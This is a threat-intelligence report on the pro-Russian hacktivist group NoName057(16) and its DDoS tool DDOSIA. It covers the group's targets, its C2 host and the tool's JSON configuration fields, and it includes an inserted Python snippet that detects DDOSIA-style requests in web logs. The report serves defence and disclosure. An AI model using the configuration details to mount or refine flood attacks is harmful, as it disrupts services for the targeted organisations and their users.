NoName057(16), also known as NoName05716, 05716nnm or Nnm05716, is a relatively underreported hacktivist group supporting Russia since March 2022, alongside Killnet and other pro-Russian groups. In December 2022, the group was responsible for disrupting the Polish government website. As noted by the Polish government, the incident was in response to the Sejm of the Republic of Poland officially recognizing Russia as a state sponsor of terrorism in mid December 2022. More recently, the group targeted the Danish financial sector, impacting leading financial institutions as reported by Reuters.

Motivations and Objectives

The NoName057(16) group is primarily focused on disrupting websites important to nations critical of Russia’s invasion of Ukraine. Distributed Denial of Service (DDoS) attacks act as the method to conduct such disruption efforts.

Initial attacks focused on Ukrainian news websites, later shifting to NATO-associated targets. For example, the first disruption the group claimed responsibility for was the March 2022 DDoS attacks on the Ukrainian news and media websites Zaxid, Fakty UA, and others. Overall the motivations center around silencing what the group deems to be anti-Russian.

Operating Methods – Telegram Channel

NoName057(16) operates through Telegram to claim responsibility for its attacks, mock targets, make threats, and generally justify its actions as a group. Interestingly, NoName057(16) makes attempts to teach its followers through educational content such as explaining basic industry jargon and attack concepts.

With an average of six posts per day, the overall engagement of NoName057(16)’s Telegram efforts has slowly declined over time. Peak viewership of their posts occurred in July 2022, when they reached approximately 14,000 readers with nearly 100% engagement rate. Today, daily average reach is roughly 2,000-3,000 and engagement is in the range of 10-20%, signifying that the group is becoming less relevant to their followers and to Telegram users as a whole. This may be explained in part by the fact that many similar hacktivist groups exist, have gained more attention, and are often more impactful in their objectives.

Views and engagement rate of NoName057(16) Telegram Posts (telemetr.io)

Evidence from NoName057(16)’s Telegram channel indicates that the group values the recognition their attacks achieve through being referenced online including in Wikipedia articles. The channel also posts pro-Russian memes, motivational posts, and general status updates around the holidays. The observed Telegram activity makes it clear that the group considers itself a top tier Russian threat actor when in reality the impact of their DDoS attacks is short-lived disruption with little to no wider consequence.

NoName057(16) New Year Update

We have reported the associated accounts/channels to the Telegram Abuse team.

Tool Hosting on GitHub

The group has also made use of GitHub to host a variety of illicit activity. This includes using GitHub Pages for freely hosting their DDoS tool website dddosia.github[.]io, and the associated GitHub repositories for hosting the latest version of their tools as advertised in the Telegram channel. Two GitHub profiles of interest are dddosia and kintechi341. Early commits to the ddos_config repo were made in the name of “Роман Омельченко”.

Associated dddosia GitHub Profile

Associated kintechi341 GitHub Profile

We reported the abuse of these services to the GitHub Trust & Safety team, who quickly took action as a violation of GitHub’s Terms of Service.

Network

The C2 services are primarily hosted through Neterra, the Bulgarian telecommunications organization, while also making use of No-IP Dynamic DNS services. The current C2 is zig35m48zur14nel40[.]myftp[.]org at 31.13.195[.]87. This server is active as of this release.

Targets

Throughout the life of the group, NoName057(16) has focused on targeting Ukraine and NATO member countries. Organizations targeted are commonly critical infrastructure sectors whose operations are vital to the target nation.

Target selection shifts according to current political events. As previously noted, the Polish government was a December target following the Sejm of the Republic of Poland officially recognizing Russia as a state sponsor of terrorism in mid December 2022. At the start of January 2023, a large focus was placed on targeting Lithuanian organizations, primarily in the cargo and shipping sectors. Most recently the actor began focusing on targeting leading Danish financial institutions including Danske Bank, Danmarks Nationalbank, and others reported in the media this week.

On January 11th 2023, we observed the actor begin targeting websites owned by multiple 2023 Czech presidential election candidates. The election is occurring on January 13th and 14th 2023, so the timing of the disruption efforts cannot be ignored. Specific targets include domains for candidates Pavel Fischer, Marek Hilšer, Jaroslav Bašta, General Petr Pavel, and Danuše Nerudová. Additionally, the Ministry of Foreign Affairs of the Czech Republic website was targeted at the same time. We notified Czech CERT upon discovery of the new target list.

Attack Toolkit

NoName057(16) has made use of a number of different tools to conduct their attacks throughout 2022. In September, Avast reported on the threat actor using the Bobik botnet to conduct their DDoS attacks. However, the group appears to primarily seek participation voluntarily through their DDOSIA tool – also referred to by its developer as Dosia and Go Stresser, depending on versioning.

We analyzed two different implementations of DDOSIA: a Python and a Golang implementation. The Python DDOSIA implementation is delivered as a PyInstaller package. The Golang implementation refers to itself internally as Go Stresser.

The internal DDOSIA reference Go Stresser

DDOSIA is a multi-threaded application that conducts denial-of-service attacks against target sites by repeatedly issuing network requests. DDOSIA issues requests as instructed by a configuration file that the malware receives from a C2 server when started. The configuration file is in JSON format and resides at the /client/get_targets URL path on the C2 server. Historical configuration files can be reviewed in archived October and December 2022 server responses.

DDOSIA configuration file (a snippet)

For each target site, the configuration file specifies:

  • A unique target identifier in the field id.
  • Target network endpoint information in the fields host, address, and port – a hostname, an IP address, and a port.
  • A network request type and method pair in the fields type and method. The DDOSIA samples and configuration files we analyzed indicate that the malware supports the request types http, http2, and tcp, and the request methods – HTTP verbs – GET and POST (for the request types http or http2) and syn (for the request type tcp). Based on the configured type and method, DDOSIA constructs HTTP or TCP network packets (requests) to send to a target site.
  • A URL path and request body in the fields path and body for network requests of type http or http2. If the path and/or body fields have values, DDOSIA constructs and issues requests with the configured request body to the configured URL path at the target site.

A Python DDOSIA implementation constructs a TCP SYN packet
A Golang DDOSIA implementation constructs an HTTP POST request

DDOSIA replaces $_{number} substrings specified in the configuration file with random values that the malware generates when constructing a network request. In a DDOSIA configuration file, $_{number} substrings are typically placed in path fields. The Python implementation of DDOSIA uses templates defined in the randoms field in the configuration file for generating random string values.

A $_{number} substring in a DDOSIA configuration file
The randoms field in a DDOSIA configuration file (a snippet)
A Python DDOSIA implementation generates random values

A DDOSIA configuration file specifies URL paths and request bodies that are valid at the respective target sites. This indicates that the DDOSIA operators construct configuration files by first exploring target sites. For example, the URL https://www.defensie[.]nl/actueel/nieuws?pagina={number} is a valid news page iterator at the website of the Dutch Ministry of Defense.

DDOSIA configuration for targeting the Dutch Ministry of Defense

Beyond those above, a configuration file may instruct the malware to enable additional DDOSIA features. For example, the use_random_user_agent field instructs DDOSIA to randomly select a user agent from a list of predefined user agents when constructing an HTTP request. Also, the fields activate_by_schedule, started_at and finished_at indicate that a DDOSIA sample can be configured to schedule the sending of network requests over specific date-time intervals. The samples we analyzed do not make use of these configuration parameters; instead they repeatedly send network requests to each target site until terminated.
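As an added defensive illustration (not code from the report or from DDOSIA), the block below parses a configuration laid out with the fields described above, turns each http/http2 target's path into a regex in which the $_{number} placeholders become wildcards, and flags matching requests in web-server log lines. The JSON sample and log lines are constructed; the top-level "targets" key, the $_<digits> spelling of the placeholder and the simplified log layout are assumptions.

```python
import json
import re

SAMPLE_CONFIG = json.dumps({"targets": [  # constructed; "targets" key is an assumption
    {"id": 1, "host": "www.example.test", "address": "198.51.100.10", "port": 443,
     "type": "http2", "method": "GET", "path": "/actueel/nieuws?pagina=$_1", "body": ""},
    {"id": 2, "host": "bank.example.test", "address": "198.51.100.20", "port": 443,
     "type": "http", "method": "POST", "path": "/login", "body": "user=$_2&pass=$_3"},
    {"id": 3, "host": "mail.example.test", "address": "198.51.100.30", "port": 25,
     "type": "tcp", "method": "syn", "path": "", "body": ""},
]})

PLACEHOLDER = re.compile(r"\$_\d+")  # assumed spelling of the $_{number} substring
WILDCARD = r"[^/&?]+"                # matches one randomly generated token

def parse_targets(raw):
    """Return http/http2 targets with a compiled path regex in which every
    $_<n> placeholder is replaced by a single-token wildcard."""
    targets = []
    for t in json.loads(raw)["targets"]:
        if t["type"] not in ("http", "http2"):
            continue  # tcp/syn targets carry no request path to match on
        pattern = WILDCARD.join(re.escape(p) for p in PLACEHOLDER.split(t["path"]))
        targets.append({"id": t["id"], "host": t["host"], "method": t["method"],
                        "path_re": re.compile("^" + pattern + "$")})
    return targets

# simplified access-log layout (constructed): client vhost "METHOD path proto" status
LOG_LINE = re.compile(r'^\S+ (?P<host>\S+) "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def flag_requests(targets, log_lines):
    """Return (target id, line) for each line whose vhost, method and path match a
    configured target; a 200 reply to such a request is what DDOSIA counts as a success."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        for t in targets:
            if (m["host"] == t["host"] and m["method"] == t["method"]
                    and t["path_re"].match(m["path"])):
                hits.append((t["id"], line))
    return hits

SAMPLE_LOG = [  # constructed lines
    '203.0.113.5 www.example.test "GET /actueel/nieuws?pagina=48213 HTTP/2.0" 200',
    '203.0.113.5 www.example.test "GET /actueel/nieuws/archief HTTP/2.0" 200',
    '203.0.113.9 bank.example.test "POST /login HTTP/1.1" 200',
    '203.0.113.9 bank.example.test "GET /login HTTP/1.1" 200',
]
```

Matched lines are candidates for rate limiting or a non-200 response, since only 200 replies feed the success counter DDOSIA reports to its operators.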

Predefined DDOSIA user agents

We note that there are differences regarding what configuration values and features are supported by different DDOSIA builds and implementations. This indicates that DDOSIA is under continuous development and is subject to frequent changes.

For example, the Golang DDOSIA implementations we analyzed support the network request type http2, whereas their Python counterparts do not implement this support.

An implementation of the http2 network request type

In addition, Golang DDOSIA implementations authenticate themselves to C2 servers by issuing an HTTP POST request to the /login_new URL path at the servers and terminate if the authentication fails. The Python DDOSIA implementations that we analyzed do not support this feature.

DDOSIA authenticates itself to a C2 server (‘Авторизация пройдена успешно’ translates from Russian to ‘Authorization completed successfully’)

DDOSIA maintains statistics about its operation and success rate – the malware counts the total and the number of successful network requests sent to each target site. In the context of network requests of type http or http2, a request is considered successful if the target site returns the HTTP code 200 (OK).

DDOSIA counts successful HTTP network requests

DDOSIA sends the statistics to the C2 server at regular time intervals – this informs the DDOSIA operators about the overall progress and success of the denial-of-service campaign that the malware conducts. This is likely tied to the group's volunteer profit program: they distribute cryptocurrency to the top DDoS contributors, encouraging people to contribute more technical resources for a more powerful attack.

Versions of the tool for macOS and Linux have also been developed. Android versions can also be found; however, the group's primary distribution has not officially supported mobile.

Conclusion

NoName057(16) is yet another hacktivist group to emerge following the war in Ukraine. While not technically sophisticated, they can have an impact on service availability – even if it is generally short lived. What this group represents is an increased interest in volunteer-fueled attacks, now with payments added for its most impactful contributors. We expect such groups to continue to thrive in today's highly contentious political climate.

We would like to thank GitHub’s Trust & Safety team for a quick response following our abuse notification. The actors’ accounts and pages are no longer online.

Indicators of Compromise

